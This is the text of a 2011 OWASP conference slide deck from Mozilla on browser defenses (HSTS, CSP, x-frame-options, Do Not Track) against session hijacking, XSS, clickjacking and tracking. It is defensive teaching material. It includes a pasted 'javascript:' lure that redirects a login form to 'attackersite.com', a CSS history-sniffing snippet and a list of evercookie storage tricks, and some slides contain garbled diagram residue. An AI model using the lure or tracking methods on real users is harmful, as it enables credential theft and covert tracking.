Copyright © The OWASP FoundationPermission is granted to copy, distribute and/or modify this document under the terms of the OWASP License.

The OWASP Foundation

OWASP

http://www.owasp.org

Enabling Browser Security in Web Applications

August 25, 2011Michael Coates - Mozilla

OWASP

About

• Michael Coates• Senior Manager, Mozilla• Lead of Infrastructure Security Team

• mcoates@mozilla.com• http://blog.mozilla.com/webappsec/• http://michael-coates.blogspot.com• @_mwc

2

OWASP

Agenda

Locking Down SSL/TLSStamping Out Cross Site ScriptingSocio-Technical Attacks Privacy

3

OWASP

Fake certificate attack targets Facebook users in SyriaMay, 2011- theregister.co.uk

How to Hijack Facebook Using FiresheepOctober, 2010 - pcworld.com

Internet traffic was routed via Chinese serversU.S. military sites includedNovember, 2010 - washingtontimes.com

Leaked Report: ISP Secretly Added Spy Code To Web Sessions, Crashing BrowsersJune, 2008 - wired.com

Locking Down SSL/TLS

4

OWASP

Risks of Insecure Communication

High likelihood of attack Open wifi, municipal wifi, malicious ISPEasy to exploit

High impact to user Clandestine monitoring of populationInjection of incorrect/malicious contentNo protection from any defensive systems Design flaw in application

5

OWASP

Insecure Session Management

Secure login over HTTPSPassword submitted encrypted

Immediate redirect to HTTPSession ID sent cleartext <-- vulnerability point

!"#$"%&'("%%)*+,-.'//012'

!"%3*+%"'

!!"#!"#$"%&'

!"%3*+%"'("&'("%%)*+,-.'//012'

https://site.com/login

http://site.com/profile

Firesheep Attack

6

OWASP

Insecure Redirects

User requests HTTP page, response redirects HTTPS302 Response is HTTP <-- Vulnerability Point

!!"#

!"#$$%%&%&&'()*+,-./'$

012$3"456".#$7/.*#5/+%$$%%&'%&&'()*+,-./'$

!"#$8##9:%&&'()*+,-./'$

211$;/<+4$

mybank.com

7

OWASP

Secure Design for Communication

HTTP Strict Transport Security (HSTS)Opt-in security controlWebsite instructs compatible browser to enable STS for

siteHSTS Forces (for enabled site):

All communication over HTTPSNo insecure HTTP requests sent from browserNo option for user to override untrusted certificates

8

OWASP

Strict Transport Security

Browser prevents HTTP requests to HSTS siteAny request to site is “upgraded” to HTTPSNo clear text HTTP traffic ever sent to HSTS siteBrowser assumes HTTPS for HSTS sites

!!"#

!"#$$$%%&%&&'()*+,-./'$ !"#$0##12%&&'()*+,-./'$

344$5/6+7$

'!(

!#

9

OWASP

Cookie Forcing

HSTS also protects against Cookie Forcing

10

OWASP

HSTS FAQ

Is HSTS Cert Pinning?No

Chicken and the EggTechnically, but drastically less chance of attack

Certificate Rotation Problem?No - HSTS forces valid certificate, doesn’t specify which

Browser SupportCurrent: Firefox & Chromehttps://www.owasp.org/index.php/

HTTP_Strict_Transport_Security#Browser_Support

11

OWASP

Protecting Outdated Users

HSTS supported in current browsers (Firefox, Chrome)

Older browsers all support SECURE Cookie FlagSECURE cookie flag

Instructs browser to only send cookie over HTTPSMuch less (and different) protection than HSTS, but

good defense in depth control

12

OWASP

Secure Flag

SECURE Flag doesn’t prevent HTTP requests like HSTS

Just removes SECURE Cookies from HTTP request

!!"#!"#$"%&'

!"%()*%"'+"&'+"%%,)*-./'00123'

+"4$5"'

!!"#!"#$"%&'

+"%%,)*-./'00123'

!"#$"%&'666'

13

OWASP

Defensive Design

HTTP Strict Transport Securityhttp://tools.ietf.org/html/draft-hodges-strict-transport-sec

Set SECURE flag for cookiesSecure application design for TLS

https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet

14

OWASP 15

Cross Site Scripting

OWASP

Risks of XSS

Top Web Security Issue on OWASP Top 10 (2011, 2007, 2004)

Impact: Vulnerability allows attacker to change any aspect of a vulnerable web page

Business Impact: Compromise of user accountsFalse data displayed on websiteRemote monitoring of user actions with websiteFull attacker control of content displayed and served

from website

16

OWASP

<div class="featured"><form action="/en-US/firefox/users/login" method="post" id="login" class="featured-inner object-lead">

<div> <input type="hidden" name="data[Login][referer]"

XSS Example

Name:_____

submit

Login: ___Pass: ____

submit to evil site

javascript

javascript<install malware>

(1) Attacker submits malicious code

(2) Code is now part of webpage

(3) Malicious site steals passwords & installs malware

(4) Attacker spreads malicious URLhttp://site.com/?a=%3cscript%3edocument%2e 17

OWASP

Frustrating Problem

XSS issues can occur anywhere user data is used in a webpage

Difficult to identify all output locationsMany frameworks allow design patterns that lead

to XSS issues

18

OWASP

Content Security Policy (CSP)

CSP - New defensive control to eliminate XSS

Allows web site to specify where JavaScript can be loaded from

Injected JavaScript via XSS is rendered inert

Violations & potential XSS attacks are reported to web site for investigation

Name:_____

submit

CSP PolicyX-Content-Security-Policy: allow 'self'; img-src 'self' data:

19

OWASP

<div class="featured"><form action="/en-US/firefox/users/login" method="post" id="login" class="featured-inner object-lead">

<div> <input type="hidden" name="data[Login][referer]" value="/en-US/developers/addons" id="LoginReferer" /><input

XSS Example with CSP

Name:_____

submit

javascript

javascript

(1) Attacker submits malicious code

Name:_____

submit

Violation report sent to site.com/CSPalert

(2) CSP prevents script execution (3) Site safe to use

20

OWASP

Implementing CSP

Some code changes needed to externalize JavaScript

Run CSP in report only mode to testEnable CSP and protect users with browsers

supporting CSPReceive alerts on potential vulnerabilities in app

and quickly address to protect remaining users

21

OWASP

CSP Violation Reporting

Violations of CSP policy reported to specified URL

Acts as XSS intrusion detection system

CSP supported in portion of site users, XSS IDS benefits all

Reported data is from client, trust accordingly

X-Content-Security-Policy: allow self; report-uri http://reportcollector.example.com/collector.cgi

22

OWASP

CSP Violation Reporting

javascript

Violation report sent to site.com/CSPalert

CSP Violation

Report Includes:HTTP Requestrequest-headersblocked-uriviolation-directiveoriginal-policy 23

OWASP

CSP Violation Report

24

OWASP

Other CSP Benefits

Prevent ClickJacking via frame-ancestorsControl embeded frames via frame-srcControl domains for images via img-srcControl target domains via xhr-srcEnforce specific protocols (https://*.foo.com)Future enhancement to control actions & malicious

forms

25

OWASP

Protecting Outdated Users

HTTPOnly mitigates one of XSS impacts - session hijacking

Supported in all recent browsersEasy, opt-in security control to protect users

javascript

Cookie: SessionID

Attacker’s Site

26

OWASP

Defensive Design

CSP gaining traction, potential to solve pressing web security risk

HTTPOnly flag - easy setting to add additional layer of defense

OWASP XSS Prevention Cheat Sheethttps://www.owasp.org/index.php/XSS_

%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet

27

OWASP 28

Socio-Technical Attacks “Visual Fraud”

OWASP

ClickJacking

Attacker includes victim page in iframe & overlays opaque layer

Attacker’s image image entices click and text interaction

Clicks are registered on victim site underneath

User inadvertently performs action at victim site

Attacker’s Overlay

Victim Site

29

OWASP

ClickJacking Example

[ ] Grant Joe full profile access

Click to follow Joe

Confirm

Click the Bouncing Ball

30

OWASP

ClickJacking Defenses

x-frame-options headerFull solutionCompatible with new versions of browsers

Frame Busting ScriptsPartial solutionCompatible with older browsers

31

OWASP

x-frame-options

Additional header for HTTP Response

Instructs browser to disallow framing

Two options - DENY, SAMEORGIN

Text

HTTP/1.1 200 OKServer: Apache-Coyote/1.1Content-Type: text/html;Vary: Accept-EncodingContent-Length: 35236x-frame-options: DENY

HTTP/1.1 200 OKServer: Apache-Coyote/1.1Content-Type: text/html;Vary: Accept-EncodingContent-Length: 35236x-frame-options: SAMEORIGIN

32

OWASP

x-frame-options

Targeted site not display if framed

Error page displayedPrevents ClickJacking

attackAttacker’s Overlay

Victim SiteAttempted ClickJack

x-f-o Result

33

OWASP

Frame Busting Scripts

JavaScript within page to detect framing

Will either “bust” the frame or not display content

Not optimal solution - techniques available to bypass defense

<script> if (document.top!= document.location){document.top= document.location} </script>

34

OWASP

URL Social Engineering

“Cool new hidden feature”

“Get 10 free gems for your game”

Click the square and type the secret combination

ctrl+a, ctrl+c, ctrl+l, ctrl+v and enter

35

OWASP

click square - selected text element

ctrl a - select all textctrl c - copy textctrl l - select location barctrl v - paste textenter - execute JavaScript

Danger of those keystrokes...

javascript:var xmlHttp;xmlHttp=new XMLHttpRequest();xmlHttp.open("GET", document.location, false);xmlHttp.send();xmlDoc=xmlHttp.responseText;var str=xmlDoc;x.replace(/somesite\.com/, "attackersite.com"); document.writeln(x);

javascript:....

36

OWASP

URL JavaScript

Pasted JavaScript has full control of page

Can rewrite pageExtract and send any

dataNo indication to user

username:_____password:_____submit

Before

After

username:_____password:_____submit

somesite.com

attackersite.com

37

OWASP

Defense

Code Change to BrowserRemove association between javascript: & loaded

documentRenders attack inert

38

OWASP

Privacy

Your Android Phone is Tracking YouApril, 2011 - pcworld.com

Nissan car secretly shares driver data with websitesJune, 2011 - theregister.co.uk/

Your iPhone Is Tracking Your Every MoveApril, 2011 - readwriteweb.com

Mobile-App Makers Face U.S. Privacy InvestigationApril, 2011 - online.wsj.com

39

OWASP

Privacy

Business gains from gathering user dataPrivacy infringement based on lawsPrivacy concerns based on user expectationsNeed better options for user to understand

collected data, control flow and accessibility of user data

40

OWASP

Browser Profiling

PanopticlickFingerprints browser based

on provided informationPlugins installedFont SupportScreen ResolutionTime Zone

Your browser fingerprint appears to be unique among the 1,636,839 tested so far.Currently, we estimate that your browser has a fingerprint that conveys at least 20.64 bits of identifying information.

41

OWASP

CSS History Sniffing

Determine user’s browsing habits with CSS

Visited link different than non-visited link

CSS and element inspection determines visited pages

Issued fixed March 2010

Visited Link

Unvisited Link

if (getComputedStyle(link, "").color == "rgb(0, 0, 128)") { // link.href has not been visited} else { // link.href has been visited }}

http://dbaron.org/mozilla/visited-privacy

42

OWASP

Evercookie

“Its [evercookie] goal is to identify a client even after they've removed standard cookies, Flash cookies (Local Shared Objects or LSOs), and others.”

Multiple methods of storing & data on client

Could be abused for unauthorized tracking

Goal to keep user in control of data storage / tracking mechanisms

• Standard HTTP Cookies

• Local Shared Objects (Flash Cookies)

• Silverlight Isolated Storage

• Storing cookies in RGB values of auto-generated, force-cached

• PNGs using HTML5 Canvas tag to read pixels (cookies) back out

• Storing cookies in Web History

• Storing cookies in HTTP ETags

• Storing cookies in Web cache

• window.name caching

• Internet Explorer userData storage

• HTML5 Session Storage

• HTML5 Local Storage

• HTML5 Global Storage

• HTML5 Database Storage via SQLite

http://samy.pl/evercookie/

43

OWASP

Do Not Track

Adds header DNT: 1 to all web requests

Tells websites user does not want browsing activity to be tracked

http://dnt.mozilla.org/

44

OWASP

Permission Manager

Granular management options for user interaction with sites

ControlLocation SettingsCookie SettingsPopup WindowsOffline Storage

about:permissions

45

OWASP

Privacy Design

Privacy controls distinguish applicationsDesign with privacy in mindGrowing support for DNT

46

OWASP

Closing

Defense In DepthMany new security controls to enhance security Strict Transport SecurityContent Security Policyx-frame-optionsDo Not Track

47

OWASP

Thanks!

mcoates@mozilla.com

@_mwc

48